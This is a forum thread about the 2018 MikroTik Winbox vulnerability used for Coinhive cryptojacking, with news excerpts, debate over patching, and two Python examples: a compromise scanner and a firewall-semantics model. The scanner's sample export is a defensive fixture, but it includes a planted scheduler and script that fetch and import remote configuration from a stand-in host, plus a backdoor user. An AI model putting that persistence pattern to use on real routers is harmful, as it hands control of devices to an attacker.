Mikrotik in the news... bad news

Hacked MikroTik routers inject cryptominer onto websites

Thursday, August 2, 2018, 11:30 by Editors

Researchers have discovered tens of thousands of hacked routers from manufacturer MikroTik that inject a cryptominer on all websites visited by the owners. It may even involve 170,000 hacked routers, according to researcher Simon Kenin of security company Trustwave in a blog post.

The MikroTik routers are hacked through a vulnerability patched by MikroTik on April 23 this year. Even so, hundreds of thousands of vulnerable routers can still be found, according to Kenin. The vulnerability could allow a remote attacker to access a vulnerable MikroTik router. Then a script is executed that injects the Coinhive cryptominer on all websites that the owner visits.

Coinhive is a cryptominer that uses the computational power of the computer via the browser to mine the cryptocurrency Monero. For this, the computer performs a cryptographic calculation. Figures from analysis platform Censys.io show that the cryptominer is active on more than 170,000 MikroTik routers. 70,000 of the routers are said to be in Brazil. Owners of the devices are advised to install the latest firmware update.

Source: Security.nl
https://www.security.nl/posting/571954/Gehackte+MikroTik-routers+injecteren+cryptominer+op+websites

More links:
https://www.bleepingcomputer.com/news/security/massive-coinhive-cryptojacking-campaign-infects-170-000-mikrotik-routers/

https://securityboulevard.com/2018/08/coinhive-miner-virus-outbreak-has-infected-170000-routers/

https://www.itwire.com/security/83882-brazil-hit-by-coinhive-injection.html

Update: the CVE number for this is CVE-2018-14847; it was filed/created on the second of August 2018.

Mikrotik staff already posted a reminder for users to upgrade.
More info here http://forum.mikrotik.com/t/winbox-vulnerability-please-upgrade/122004/1

The sad part is that the exploit is more than two months old…

You mean the one they patched back in April 2018? Or the one that was patched in March 2017? What really is sad is the amount of Mikrotik users who have let their devices sit unwatched, unmaintained and unupdated for months and years on end.

There was a bug that allowed the passwords configured on the router to be read. After that the hacker can use them and log into the router as a normal user. Then he can do whatever he wants. Upgrading will close this vulnerability, but if the password is not changed, then the hacker can still connect.

The hacker connects to the router and adds configuration: scripts, schedulers, enables SOCKS, etc. The RouterOS filesystem is not affected. The only changes made by the hacker are to the RouterOS configuration.
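The staff reply above says the attacker's changes live only in the RouterOS configuration (scripts, schedulers, SOCKS) and that an upgrade without a password change leaves the door open. The following is an added example, not code from the thread or from MikroTik, that looks for exactly those traces in the text of a `/export` dump. The sample export, the attacker's address and the script and user names are constructed; the fixed version 6.42.1 is taken from MikroTik's April 2018 advisory, not from this page.

```python
"""Scan a RouterOS '/export' dump for the traces described in the thread:
added scripts and schedulers, the SOCKS proxy switched on, extra full-rights
users, and a firmware version that predates the Winbox fix.

Added example; the export below is constructed, not a real compromised device.
"""
import re

# 6.42.1 closed the Winbox hole (6.40.8 on the long-term branch); the version
# number comes from MikroTik's April 2018 advisory, not from this page.
FIXED_VERSION = (6, 42, 1)

# Constructed sample: what 'admin' might see after '/export' on a hacked box.
SAMPLE_EXPORT = """\
# aug/02/2018 10:00:00 by RouterOS 6.40.5
# software id = XXXX-XXXX
/interface ethernet
set [ find default-name=ether1 ] name=wan
/ip socks
set enabled=yes port=4145
/system scheduler
add interval=10m name=upd123 on-event=script1 policy=\\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \\
    start-time=startup
/system script
add name=script1 owner=admin policy=ftp,read,write,test source="/tool fetch \\
    address=198.51.100.7 src-path=/update.rsc mode=http dst-path=u.rsc; \\
    /import u.rsc"
/user
add name=service group=full password=changeme
"""

VERSION_RE = re.compile(r"by RouterOS (\d+)\.(\d+)(?:\.(\d+))?")
# key=value pairs; a quoted value may contain spaces and '=' (e.g. source="...")
PARAM_RE = re.compile(r'(\S+?)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_export(text):
    """Return (version tuple or None, [(section, verb, {param: value}), ...])."""
    m = VERSION_RE.search(text)
    version = tuple(int(x or 0) for x in m.groups()) if m else None
    # RouterOS wraps long lines with a trailing backslash plus indentation;
    # removing that sequence restores the original single-line command.
    text = re.sub(r"\\\n\s*", "", text)
    section, entries = None, []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            section = line            # e.g. "/system scheduler"
            continue
        verb, _, rest = line.partition(" ")   # add / set / remove ...
        params = {k: v.strip('"') for k, v in PARAM_RE.findall(rest)}
        entries.append((section, verb, params))
    return version, entries


def scan(text):
    """Return human-readable findings; an empty list means nothing suspicious."""
    version, entries = parse_export(text)
    findings = []
    if version is not None and version < FIXED_VERSION:
        findings.append("RouterOS %s predates the Winbox fix; upgrade first, "
                        "then change every password" % ".".join(map(str, version)))
    for section, verb, p in entries:
        if section == "/ip socks" and p.get("enabled") == "yes":
            findings.append("SOCKS proxy enabled on port %s" % p.get("port", "1080"))
        elif section == "/system scheduler" and verb == "add":
            findings.append("scheduler '%s' runs '%s' every %s"
                            % (p.get("name"), p.get("on-event"), p.get("interval")))
        elif section == "/system script" and verb == "add":
            src = p.get("source", "")
            note = ("(downloads and imports remote config)"
                    if "/tool fetch" in src and "/import" in src else "")
            findings.append("script '%s' %s" % (p.get("name"), note))
        elif section == "/user" and verb == "add" and p.get("group") == "full":
            findings.append("extra full-rights user '%s'" % p.get("name"))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EXPORT):
        print(" -", f)
```

Run it against a real dump saved from Winbox or the terminal (`/export file=dump` then `scan(open("dump.rsc").read())`). Anything it lists that you did not add yourself is the attacker's foothold, and it survives the firmware upgrade; removing it and changing every password, in that order after upgrading, is what actually evicts them.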

Have a look at the posting times; my posting is probably the trigger for Mikrotik posting and, hopefully, taking more public steps.

The sad part is that owners/admins DO NOT CARE.

What public steps? They fixed it in April!!! They are just now telling us “Hey, this is still happening. Make sure you updated.” This is just another repeat of VPNFilter when the patch was released a year ago but the malware made news in May (a year later) and people demanded to know what Mikrotik was doing RIGHT NOW about it despite the fact they addressed it a year ago.

Who could dream (nightmare) that your router hands out its most secret information to everyone that asks for it.

And that statement right there is the crux of the issue.

I’m not arguing the point that there was a vulnerability that was pretty major, but it was addressed months ago when it became public knowledge. Asking what they are doing today about something they addressed already just means no one is really paying attention to what Mikrotik is doing and putting out. They seem to only care (freak out) when a random website blog tells them about it.

@msatter:
How do you expect Mikrotik to persuade people MORE to upgrade if they (the users, not Mikrotik) do not care? It is not a matter of how much information Mikrotik publishes. If the admin/user/owner does not care, then it is not Mikrotik's problem.
Do you think that other companies call or mail each customer to inform them about their security problems?

Sorry, but you must have seen that we are pushing to get up to speed in communicating important stuff.

IT IS TOO LATE NOW and the bad news had to be pushed down everyone's throat in the past months.

Now they care and have seen some go mad in their first posting.

I am sure Winbox could display the minimal recommended RouterOS version and keep that in view as long as you are lagging behind.

If I was not in the forum I would have totally missed that the router was that easy to hack.

If everyone is looking at each other to see what they can come away with then you are depicting the current time.

Mikrotik did a good job in timely fixing and communicating the security issue with their customers.
It’s not their fault but many admins and device owners are just lazy or do not check the news.

@MT: Maybe a security announcement mailing list like other vendors offer could be beneficial for the future.

@msatter
Do you think that all 70 000 users of hacked devices in Brazil do even know what WinBox is?

You understand how this works, right? Cisco isn’t going to get an alert from some security group/person on Monday that says “Oh, there’s a major exploit” and then announce it on Tuesday to their users. Why? Because they probably don’t have a fix for it yet, and announcing something that only a small group (Cisco and the reporters) may know exists just puts a target on all the possibly infected devices before they could push a fix for them. It might take Cisco weeks to disclose this exploit to their users so they can determine how serious it is, how to fix it and release said fix for the users, so the announcement is “There’s an exploit, please update to X version for the fix along with X, Y, Z to ensure you’re not compromised”.

But let’s be honest here. This Winbox fix, when announced, had instructions of “Update THEN change passwords” but people were still like “I got hacked even though I did the update” and it turns out that they either updated the passwords then did the ROS update or just did the ROS update without touching their passwords. While they may stop FUTURE attacks, if they were already compromised they didn’t do the step to fix that problem or they did it in the wrong order.

I’m with BartoszP on this. While Mikrotik can take some of the blame for perhaps not “communicating fast enough” it really doesn’t matter how fast they communicate or how many methods they use to communicate when the users (you and I) ignore it and do NOTHING. Even worse, not ignore it but not follow the actual instructions properly. At some point the users have to step up and take responsibility for their laziness and/or not taking action.

Hmmmmmm you are giving me an idea.

RouterOS calls home each day or week to check if there is something wrong. If so, every HTTP session gets a page displayed that an update is needed because the router is below the minimal required version.

If ignored, then after two weeks the router only functions when you initiate an update. After the update all the functions are restored.

Mikrotik happy, user happy or not, and the rest of the world is a bit safer again.

The main problem with Mikrotik/RouterOS in my opinion is the default “accept any”, whereas it should be “reject any except…” instead. Mikrotik might consider shipping future ROS devices with a stronger default firewall ruleset which locks down all services except Winbox/SSH from an Internal IP range on a single interface. Security should be by-default and not optional nowadays.

Unfortunately too many admins and device owners simply do not care enough, do not read the manual/wiki and just unpack and connect their new device happily to the internet. That’s where the problem begins.

Schadom, what do you mean? The default firewall DROPS ALL from the internet interface.
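Schadom's "accept any" and BartoszP's "drops all" are both right in their own way: a RouterOS filter chain has no configurable default policy, so a packet that matches no rule is accepted, and the stock default configuration is closed only because its last input rule explicitly drops traffic that does not arrive from the LAN interface list. The block below is an added example, not code from the thread or from MikroTik, that models that first-match-then-accept behaviour over two constructed input chains. The rule sets, interface lists and packets are modelled on the default configuration rather than copied from any particular RouterOS version.

```python
"""Model RouterOS input-chain semantics to settle the 'accept any' question:
a chain has no default-deny policy, so a packet that matches no rule is
accepted.  The stock default configuration is safe only because its last
input rule explicitly drops everything not arriving from the LAN list.

Added example with constructed rulesets; DEFAULT_INPUT is modelled on the
defconf firewall, not copied from a specific RouterOS version.
"""

# Constructed interface lists, as the default configuration builds them.
INTERFACE_LISTS = {"WAN": {"ether1"}, "LAN": {"bridge"}}

# Someone deleted the final 'drop everything from !LAN' rule to 'get a VPN
# working'; nothing that remains matches a fresh inbound connection.
WEAK_INPUT = [
    {"chain": "input", "action": "accept", "connection-state": {"established", "related"}},
    {"chain": "input", "action": "drop", "connection-state": {"invalid"}},
]

# Shape of the stock default firewall for the input chain.
DEFAULT_INPUT = [
    {"chain": "input", "action": "accept", "connection-state": {"established", "related", "untracked"}},
    {"chain": "input", "action": "drop", "connection-state": {"invalid"}},
    {"chain": "input", "action": "accept", "protocol": "icmp"},
    {"chain": "input", "action": "drop", "in-interface-list": "!LAN"},
]

# Constructed packets: a fresh Winbox connection (TCP/8291) from the internet
# side, the same thing from the LAN, and the reply half of an existing flow.
WAN_WINBOX = {"chain": "input", "in-interface": "ether1", "protocol": "tcp",
              "dst-port": 8291, "connection-state": "new"}
LAN_WINBOX = {**WAN_WINBOX, "in-interface": "bridge"}
WAN_REPLY = {**WAN_WINBOX, "connection-state": "established"}


def matches(rule, pkt):
    """True if every matcher in the rule agrees with the packet."""
    for key, want in rule.items():
        if key in ("chain", "action"):
            continue
        if key == "in-interface-list":
            negate = want.startswith("!")
            member = pkt["in-interface"] in INTERFACE_LISTS[want.lstrip("!")]
            if member == negate:      # wanted membership, got none (or vice versa)
                return False
        elif key == "connection-state":
            if pkt.get("connection-state") not in want:
                return False
        elif pkt.get(key) != want:
            return False
    return True


def evaluate(rules, pkt):
    """First matching rule wins; with no match RouterOS accepts the packet."""
    for rule in rules:
        if rule["chain"] == pkt["chain"] and matches(rule, pkt):
            return rule["action"]
    return "accept"


def winbox_reachable_from_wan(rules):
    """The question the thread is really asking about a given ruleset."""
    return evaluate(rules, WAN_WINBOX) == "accept"


def to_routeros(rules):
    """Render the rule list in '/export' syntax so it can be compared with a device."""
    lines = ["/ip firewall filter"]
    for r in rules:
        parts = ["action=" + r["action"], "chain=" + r["chain"]]
        for k, v in r.items():
            if k not in ("action", "chain"):
                parts.append("%s=%s" % (k, ",".join(sorted(v)) if isinstance(v, set) else v))
        lines.append("add " + " ".join(parts))
    return "\n".join(lines)


if __name__ == "__main__":
    for name, rules in (("weak", WEAK_INPUT), ("default", DEFAULT_INPUT)):
        print("%s ruleset: Winbox from WAN -> %s" % (name, evaluate(rules, WAN_WINBOX)))
    print(to_routeros(DEFAULT_INPUT))
```

The practical check is the last rule of your own input chain: if nothing in `/ip firewall filter print` ends with a drop for traffic from the WAN side, the implicit accept is doing the rest of the job, and Winbox, SSH and the API are reachable from the internet whatever the device looked like when it left the box.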